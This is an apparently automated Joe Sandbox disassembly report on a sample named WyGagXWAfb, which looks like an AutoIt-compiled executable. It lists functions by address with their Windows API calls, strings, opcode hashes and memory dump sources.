String ID:
API String ID: 3897988419-0
Opcode ID: 8c4fef394873e7bb1befc51572fc793f43f3cc13fddf31d715781ba5f48c5ca0
Instruction ID: 221c086d3f2771f8662e2ce81282bdc75baa689f840e61715f0f7a7624612626
Opcode Fuzzy Hash: 8c4fef394873e7bb1befc51572fc793f43f3cc13fddf31d715781ba5f48c5ca0
Instruction Fuzzy Hash: E201D472600605FBDB108F58DD48BAA7BECEB44B65F104169FD05D3211EF75DD508BA0

Function 00B685F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B68608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B68612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B68621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B68628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6863E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 8977f90127642ef7b57fd418e0c8ce8d87a786cd32d6fe857b32834ad319a995
Instruction ID: 94bcf6f22e53708907ed6127ffd1d714fcfa344ed36f74f1866b6a39246efbfc
Opcode Fuzzy Hash: 8977f90127642ef7b57fd418e0c8ce8d87a786cd32d6fe857b32834ad319a995
Instruction Fuzzy Hash: 17F0AF31200205AFEB100FA4DD89E7F3BACEF89764B004226F909C3160CF649C41DA60

Function 00B68652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B68669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B68673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B68689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B6869F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 69aa2f191432c758fc734b33c8abd2b56684700585bc59d5431dabfc11c04583
Instruction ID: 377b82ccf816ac81f82560297f037297c4df22691bcb84146022f8e8af8c0e27
Opcode Fuzzy Hash: 69aa2f191432c758fc734b33c8abd2b56684700585bc59d5431dabfc11c04583
Instruction Fuzzy Hash: AEF04F71200215AFEB111FA5EC89E7B3BACEF89768B100166F945D7160CE659941DA60

Function 00B6C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00B6C6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 00B6C6D1
MessageBeep.USER32(00000000), ref: 00B6C6E9
KillTimer.USER32(?,0000040A), ref: 00B6C705
EndDialog.USER32(?,00000001), ref: 00B6C71F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 840568e3529e0c36bb55b6d2573d2ba910acfb96c34ca55e7dd4a951f5f46dfa
Instruction ID: 4f3b63f96910421fb7378ada862de9cbfc09da946e98783445932ebe020b61e9
Opcode Fuzzy Hash: 840568e3529e0c36bb55b6d2573d2ba910acfb96c34ca55e7dd4a951f5f46dfa
Instruction Fuzzy Hash: 58014470500705A7EB215B60ED8EBB67BB8FB00715F0405AAB596E24E1DBE8A954CA40

Function 00B113B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00B113BF
StrokeAndFillPath.GDI32(?,?,00B4BAD8,00000000,?), ref: 00B113DB
SelectObject.GDI32(?,00000000), ref: 00B113EE
DeleteObject.GDI32 ref: 00B11401
StrokePath.GDI32(?), ref: 00B1141C

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 8a8048f5d35b4b176d10e06a0999d3cf62604955e91f4d966bb1e910c4240958
Instruction ID: 3df1226221540d33d45d73b00f6e837f90bd0f3c15414381c1c9c472d08f9412
Opcode Fuzzy Hash: 8a8048f5d35b4b176d10e06a0999d3cf62604955e91f4d966bb1e910c4240958
Instruction Fuzzy Hash: FCF01930001309EBDB115F6AED1D7A87FE8E710326F448267E529861F1EB3249A5EF50

Function 00B7C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B7C69D
CoCreateInstance.OLE32(00BA2D6C,00000000,00000001,00BA2BDC,?), ref: 00B7C6B5

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

CoUninitialize.OLE32 ref: 00B7C922

Strings

.lnk, xrefs: 00B7C631, 00B7C659, 00B7C663

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: c3e487a2a52b9cf9bb68da48c206e816cc11f5c1442dae1a6ebf2e4ef5b13e8d
Instruction ID: e81a1e43b3c4095c19a760b28b3d6feff5e8e2754028c3e04476fc83e2a862fa
Opcode Fuzzy Hash: c3e487a2a52b9cf9bb68da48c206e816cc11f5c1442dae1a6ebf2e4ef5b13e8d
Instruction Fuzzy Hash: 99A13C71118245AFD700EF54C891EABB7FCEF88714F4049ACF196971A2EB70EA49CB52

Function 00B22E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00B30FF6: std::exception::exception.LIBCMT ref: 00B3102C
Part of subcall function 00B30FF6: __CxxThrowException@8.LIBCMT ref: 00B31041

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B17BB1: _memmove.LIBCMT ref: 00B17C0B

__swprintf.LIBCMT ref: 00B2302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00B22EC6

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: ef5e76d98d85d7904cfc9aec2fa796b5fee8a617a19ca6298bcc167ed2579deb
Instruction ID: 978995aba3db340dd78cfa188e49493e559e3312a3c17ae586cd773073f4c1c2
Opcode Fuzzy Hash: ef5e76d98d85d7904cfc9aec2fa796b5fee8a617a19ca6298bcc167ed2579deb
Instruction Fuzzy Hash: E1916C715083119FC728EF24D895DAFB7E4EF85740F50499DF886972A1DB20EE48CB62

Function 00B7BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00B148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B148A1,?,?,00B137C0,?), ref: 00B148CE

CoInitialize.OLE32(00000000), ref: 00B7BC26
CoCreateInstance.OLE32(00BA2D6C,00000000,00000001,00BA2BDC,?), ref: 00B7BC3F
CoUninitialize.OLE32 ref: 00B7BC5C

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

Strings

.lnk, xrefs: 00B7BC08, 00B7BC16

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 2cfb100f0be9f8a573fe16c6f40b62db5d14bd4591de2c2a621fcb5e2ea4b195
Instruction ID: 73a1c3c4adef27e3cde784ecf6987bd290c9f765f106a7bf260e249ef7a4d77c
Opcode Fuzzy Hash: 2cfb100f0be9f8a573fe16c6f40b62db5d14bd4591de2c2a621fcb5e2ea4b195
Instruction Fuzzy Hash: ACA124756043419FCB10DF14C494EAABBE5FF89314F148998F8A99B3A1CB31ED45CB91

Function 00B3524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00B352DD

Part of subcall function 00B40340: __87except.LIBCMT ref: 00B4037B

Strings

pow, xrefs: 00B352B5, 00B352D2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 9835bff4c70e97a22595c546bd69821b8153e5cd8e4107c06e251eda6b1f994f
Instruction ID: 35798a0cd7fbd5f8e0692df8db1c3ba2693eba9110dbbc5605ee9f130ac1053e
Opcode Fuzzy Hash: 9835bff4c70e97a22595c546bd69821b8153e5cd8e4107c06e251eda6b1f994f
Instruction Fuzzy Hash: 37515B71A2D60297C7217B24CD5137E3BE4DB00750F3449D8E6D6822E6EF748ED4AA4A

Function 00B3023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00B30280
+, xrefs: 00B30277

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 1d9c7fafcf8feff9584d58ea9c8ec0f259d26b4de48f8e15e3bfb2852d7ef6ac
Instruction ID: ca294d0ad997c5245e819331a7adde4ee88e6a32ffa54a767b6f50961a4e4f95
Opcode Fuzzy Hash: 1d9c7fafcf8feff9584d58ea9c8ec0f259d26b4de48f8e15e3bfb2852d7ef6ac
Instruction Fuzzy Hash: C3511575104646DFCF25AF28C498AFA7BE4EF19310F2440E5E8919B2E0DB389C62C760

Function 00B262F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B263A8
_memmove.LIBCMT ref: 00B26446
_memset.LIBCMT ref: 00B2646A

Strings

ERCP, xrefs: 00B26313

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 0e6df95ea3f29ec065e46f3f02124c94afdcd1671429626e4f52a279743b51c8
Instruction ID: 2cc409f9dd0328672c180533e0132860c1fd2094781cb9294dc6e31d833ef132
Opcode Fuzzy Hash: 0e6df95ea3f29ec065e46f3f02124c94afdcd1671429626e4f52a279743b51c8
Instruction Fuzzy Hash: DD51E471900319DFCB24DF65D881BAABBF4EF04314F2085AEE59ED7240E774AA84CB80

Function 00B97BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B9F910,00000000,?,?,?,?), ref: 00B97C4E
GetWindowLongW.USER32 ref: 00B97C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B97C7B

Strings

SysTreeView32, xrefs: 00B97C20

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 95f05d56f9fa9fd31497f73a6f7e948993fc19e3560d702ea5316baa4d53d830
Instruction ID: d19e038eb43b2dfc2046af52098f7174eb528990018cb64d90cd58ecdf59259d
Opcode Fuzzy Hash: 95f05d56f9fa9fd31497f73a6f7e948993fc19e3560d702ea5316baa4d53d830
Instruction Fuzzy Hash: 9E31AD31254206ABDF118F38DC45BEA77E9EB09324F244765F975E32E0DB31E8909B60

Function 00B97648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B976D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B976E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 00B97708

Strings

SysMonthCal32, xrefs: 00B9769B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 90c4ed19aeee00ddb676741a76a2a1ea08ae5fc70f8a1e1ee46b3482d9389017
Instruction ID: fe018c67cc78d67ff89ca352dd2ec1c95756e22522206f09c094def9595529b4
Opcode Fuzzy Hash: 90c4ed19aeee00ddb676741a76a2a1ea08ae5fc70f8a1e1ee46b3482d9389017
Instruction Fuzzy Hash: 8321A332554219BBDF11CFA4CC46FEA3BE9EF48724F1102A4FE156B1D0DAB5AC518BA0

Function 00B96F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B96FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B96FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B96FDF

Strings

Listbox, xrefs: 00B96F77

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: f0b9a5692cc21aacff3d822de982cd69385fca114f2327442b0a01f5746902d2
Instruction ID: 7f202f585e91458a586d0e1fdda46c3c0326dafbd885358dedf0861d3db31278
Opcode Fuzzy Hash: f0b9a5692cc21aacff3d822de982cd69385fca114f2327442b0a01f5746902d2
Instruction Fuzzy Hash: BE218E32610118BFDF118F54EC85FBB3BAAEF89764F018175FA149B1A0CA71AC518BA0

Function 00B9797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B979E1
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B979F6
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B97A03

Strings

msctls_trackbar32, xrefs: 00B979B8

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 14ab46c5626e08c4a2524a1e0fc433290ae0cb34d3af348781658b93f99d0f02
Instruction ID: 87dba412f57d1c1a6d5c815212bd8845165ee1ae61aa431039a7a4baa606394f
Opcode Fuzzy Hash: 14ab46c5626e08c4a2524a1e0fc433290ae0cb34d3af348781658b93f99d0f02
Instruction Fuzzy Hash: A411E3722A4208BFEF109F64CC45FEB77E9EF89764F024569FA41A6090DA719851CB60

Function 00B14C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14C2E), ref: 00B14CA3
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B14CB5

Strings

GetNativeSystemInfo, xrefs: 00B14CAF
kernel32.dll, xrefs: 00B14C9E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 2c0f0f05d4f232a6cbd3c56dda40f5df04f658dd666ba570f91ec60704756062
Instruction ID: c82b7cdc45d227c7cd3137f2845f626e1d8a2285651ae11e4e5fb17b43c5b192
Opcode Fuzzy Hash: 2c0f0f05d4f232a6cbd3c56dda40f5df04f658dd666ba570f91ec60704756062
Instruction Fuzzy Hash: ECD01230510723CFDB205F31DA5865676D5EF057B1B15C87A9885D6160DBB0D4C0CA90

Function 00B14D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14CE1,?), ref: 00B14DA2
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B14DB4

Strings

kernel32.dll, xrefs: 00B14D9D
Wow64RevertWow64FsRedirection, xrefs: 00B14DAE

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 691dc54946bda8de91956d49488d600b3140f17df53e47ba2e7cc3f90a00b8f9
Instruction ID: 4ff0ec5c8f32ac8708986e0a230e6e50dd6cf88e5d6aba2a0dc674f07af03eaf
Opcode Fuzzy Hash: 691dc54946bda8de91956d49488d600b3140f17df53e47ba2e7cc3f90a00b8f9
Instruction Fuzzy Hash: E3D01731650723CFDB209F31E908B9676E4EF06365B11C8BED8C6E6160EBB0D8C0CA91

Function 00B14D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00B14D2E,?,00B14F4F,?,00BD62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B14D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B14D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00B14D7B
kernel32.dll, xrefs: 00B14D6A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
